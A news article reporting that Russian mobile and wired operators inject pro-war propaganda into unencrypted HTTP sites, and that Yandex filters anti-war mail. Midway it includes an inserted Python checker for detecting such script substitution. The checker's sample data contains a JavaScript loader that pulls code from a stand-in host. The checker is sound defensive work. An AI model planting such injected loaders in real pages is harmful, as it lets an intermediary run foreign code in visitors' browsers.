Rostelecom and Megafon take advantage of vulnerable sites to promote war in Ukraine

Rostelecom and advertising of the “national idea of our leader”

Russian ISP Rostelecom places state media propaganda news about the war in Ukraine on sites without HTTPS (Hypertext Transfer Protocol Secure), that is, sites served over plain “http”. HTTPS supports encryption for increased security and protects against attacks based on listening to a network connection. Twitter user @MosSobyaniin was the first to notice this when he “tested his site” on the GitHub web service. Roskomsvoboda specialists confirmed to The Insider that, according to their observations, almost all mobile operators and some “wired” operators are engaged in HTTP traffic spoofing.

According to a user who tested his site, the links lead to materials from Tsargrad, Regnum, InoSMI, Lenta.ru, and other media about the war, “our leader’s national idea,” as well as texts that justify Russia’s crimes in Ukraine.

The author of the thread explained that Rostelecom intercepts the request for the first JS script sent over the unencrypted http protocol and returns to the browser a phishing script that inserts banners on the page. The request parameters of the phishing script include the address of the spoofed script and the subscriber's connection region. Next, the real script of the requested site is loaded. The substitution occurs only on some sites that do not use HTTPS (there are few of them, according to the user) and that have at least one JS script. The user was indignant that user traffic was being altered in favor of state propaganda and called for abandoning Rostelecom's services.

“Of course, you should immediately refuse the services of such an operator and use VPN ALWAYS – even when you are not on Twitter or Instagram. It’s scary that today Rostelecom is replacing traffic, but tomorrow they can already be on all operators with SORM.”

"MegaFon" and "Beeline" use the sites of small businesses for "war advertising"

A source of The Insider, who asked to remain anonymous, said that Russian small businesses are facing such “advertising” because it is more expensive to create websites with the HTTPS protocol. He described how his friend, the owner of a dental clinic, tried to deal with the situation, at first suspecting that the site had been hacked (the interlocutor allowed the video from the clinic's website to be published). A check showed that the advertising appears when the site is visited through the mobile operators Beeline and Megafon.

“About a month and a half ago, my friend, the owner of the clinic, contacted me with a request to urgently help, as his website was “hacked”. When he visited the site, a lot of the same type of propaganda ads were displayed, justifying Russia's military actions against Ukraine.”

According to the interlocutor, at first he thought that the hosting, the site or some external service that was used on the site had been hacked. However, it turned out that the advertisement was only visible from smartphones. The assumption that the phone was hacked was also not confirmed: advertisements were still displayed on “clean” Android and iPhone. It turned out that advertising is inserted by the mobile operator on absolutely all sites that operate on the insecure http protocol, the source notes. At the same time, sites operating on the https protocol function normally, since it is impossible to introduce foreign code into them from the operator's side.

“Such attacks are called “Man-in-the-middle” and are considered malicious. Such an attack was noticed when using the mobile operators Beeline and Megafon. The only solution to the situation is to switch the site to the https protocol. But a lot of small business owners who have simple websites do not know how to do this, and usually such a transition comes with additional financial costs, which also not everyone can afford.”

The interlocutor added that it would be very difficult for an unprepared user to find the reason for displaying such banners that appear due to "illegal actions" of operators.
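The check a site owner can run to tell operator-side substitution from a compromised server, as an added example that is not from the article or its sources: compare the script body received over the network under test with a known-good copy taken from the server, and look for a loader URL whose query parameters carry the original script's address, as the thread author described. The hostnames, the parameter names `u` and `r`, and both sample bodies are constructed for illustration.

```python
import hashlib
import re
from urllib.parse import parse_qsl, urlsplit

# Absolute or protocol-relative URLs embedded in a script body.
URL_RE = re.compile(r"""(?:https?:)?//[^\s'"<>)]+""")


def _no_scheme(url: str) -> str:
    """Drop the scheme so http://, https:// and // forms compare equal."""
    return url.split("://", 1)[-1].lstrip("/")


def check_script(script_url: str, known_good: bytes, received: bytes) -> dict:
    """Report whether `received` differs from the known-good script and
    whether it loads a URL that passes `script_url` as a query parameter."""
    report = {"modified": False, "wraps_original": False, "loader_urls": []}
    if hashlib.sha256(received).digest() == hashlib.sha256(known_good).digest():
        return report  # byte-identical: nothing was changed in transit
    report["modified"] = True
    text = received.decode("utf-8", errors="replace")
    for url in URL_RE.findall(text):
        try:
            query = urlsplit(url).query
        except ValueError:
            continue  # not a parseable URL, ignore it
        params = parse_qsl(query, keep_blank_values=True)  # percent-decodes values
        if any(_no_scheme(v) == _no_scheme(script_url) for _, v in params):
            report["wraps_original"] = True
            report["loader_urls"].append(url)
    return report


# Constructed sample data (not captured traffic).
SCRIPT_URL = "http://clinic.example/js/main.js"
KNOWN_GOOD = b"document.title = 'Clinic';\n"
SUBSTITUTED = (
    b"var s=document.createElement('script');"
    b"s.src='http://inject.example/b.js"
    b"?u=http%3A%2F%2Fclinic.example%2Fjs%2Fmain.js&r=77';"
    b"document.head.appendChild(s);"
)

if __name__ == "__main__":
    print(check_script(SCRIPT_URL, KNOWN_GOOD, KNOWN_GOOD))
    print(check_script(SCRIPT_URL, KNOWN_GOOD, SUBSTITUTED))
```

A result of `modified` with `wraps_original` on one network and a clean result on another points to the access network rather than the hosting; serving the site over HTTPS removes the operator's ability to alter the response.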

“The fact that providers do this with news about Ukraine is kind of surreal”

As expert Aleksey Shkitin told The Insider, such a substitution on unprotected sites has been used before, mainly by advertisers. However, now it has been adopted to promote propaganda texts about the war in Ukraine. In his opinion, regional providers are most likely behind the propaganda. At the same time, they did not come up with anything “extremely new”: this technology is used by advertisers, substituting “phishing sites”. In fact, this is not pure phishing, but a crime, Shkitin adds.

“Roughly speaking, when you go through an insecure channel to the site, you allow various nasty things to be written there: for example, how a provider can substitute with advertising. That is, an insecure connection is therefore unsecured because another user can get there, in this case, the provider. But the fact that providers do this with news about Ukraine is kind of surreal.”

According to Shkitin, Moscow's Rostelecom is such a "regulated office" that it is unlikely to do such things. In the case of the placement of propaganda in the form of advertising, "regional providers are currying favor," the expert believes. Now, when you go to almost any site, “propaganda news about the war in Ukraine” appears.

“They used to plant advertisements, but now they plant propaganda. It looks like a local initiative, but it is hardly systemic. There is no special meaning in this. All opposition media in Russia are inaccessible, they are essentially closed. That is, now in Russia, whatever you open, there will be propaganda.”

War emails go to spam

Not only mobile operators are trying to convey to the Russians a position convenient for the authorities about the war in Ukraine. A Russian woman who received anti-war mailings on Yandex.Mail told The Insider that she found similar emails in her Spam folder. So, without her knowledge, among the "unnecessary" letters was the answer from the Anti-War Committee of Russia.

“I wrote to the Committee, I needed to know something, and they answered me. But the letter ended up in spam, and I did not see it for several days. In addition to this letter, I found in the spam a selection of news from the Agenda, which adheres to the anti-war line and makes honest news. I am subscribed to several such mailing lists. And now, it turns out what Yandex-mail does with them.”

The interlocutor believes that this could not have happened by chance, and notes that in recent weeks, letters from publications “that are not subject to state censorship” have not appeared in the Inbox folder. According to her, the mailing should come often, so she suggested that Yandex "simply deleted" them.

This is not the first time the company has tried to hide information that the Russian authorities do not agree with. On March 1, the former head of Yandex.News Lev Gershenzon accused the Yandex.News service of hushing up the war in Ukraine.

“Today is the sixth day when at least 30 million Russian users see on the main page of Yandex that there is no war, there are no thousands of dead Russian soldiers, there are no dozens of civilians killed under Russian bombing, there are no dozens of prisoners, there is no huge destruction in various Ukrainian cities. The fact that a significant part of the population of Russia may believe that there is no war is the basis and driving force of this war. Yandex today is a key element in hiding information about the war. Every day and hour of such “news” is human lives. And you, my former colleagues, are also responsible for this.”

At the same time, the company decided to get rid of Yandex.News and Zen; a buyer was found in VK, where Vladimir Kiriyenko, the son of the deputy head of the Presidential Administration, was appointed CEO in 2021. Back in 2016, Yandex refused to work with media outlets that did not have a license from Roskomnadzor, Meduza wrote. As a result, only pro-government media now remain in the top of Yandex.

One - advertising, the other - bans

After the outbreak of the war, Roskomnadzor demanded that the Russian media use only the wording “special operation” when covering the invasion of Ukraine. Since February 24, The Insider, Radio Liberty, Current Time, Krym.Realii, Voice of America, New Times, Taiga.info, DOXA, Ekho Moskvy, Dozhd, Meduza, BBC Russian Service, Deutsche Welle and others have been blocked in Russia. TV channel "Rain", radio "Echo of Moscow" and the Tomsk agency TV2 decided to stop working. In most cases, the block was initiated by the Russian Prosecutor General's Office. Roskomnadzor also blocked the social networks Facebook, Twitter and Instagram. And the court recognized the activities of the American corporation Meta as extremist and banned it in Russia.
